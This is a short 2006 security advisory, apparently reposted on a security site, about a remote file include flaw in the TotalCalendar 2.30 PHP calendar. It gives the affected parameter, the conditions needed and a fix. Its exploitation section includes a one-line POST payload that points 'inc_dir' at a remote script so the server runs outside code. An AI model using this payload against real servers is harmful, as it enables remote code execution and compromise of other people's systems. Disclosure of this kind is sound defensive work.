TotalCalendar 2.30 - Remote File Include Vulnerability

Advisory Content :

[MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability
--------------------------------------------------------
Software: TotalCalendar
Version: 2.30
Type: Remote File Include Vulnerability
Date: April, 23th 2006
Vendor: SweetPHP
Page: http://sweetphp.com
Risc: High

Credits:
----------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de

Affected Products:
----------------------------
TotalCalendar 2.30 and prior

Description:
----------------------------
TotalCalendar is the complete solution for all of your calendar and
schedule needs.
TotalCalendar gives you the ability to create multiple calendars
and allows you to easily share and manage your events online.
The ability to allow user accounts lets you have other calendar members
help you manage your events,
users, style, and much more.

Requirements:
----------------------------
register_globals = On

Vulnerability:
----------------------------
Input passed to the "inc_dir" parameter in "index.php" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from
external resources.

Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".

Exploitation:
----------------------------
Post data:
inc_dir=http://www.yourspace.com/yourscript.php?

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

TotalCalendar 2.30 - Remote File Include Vulnerability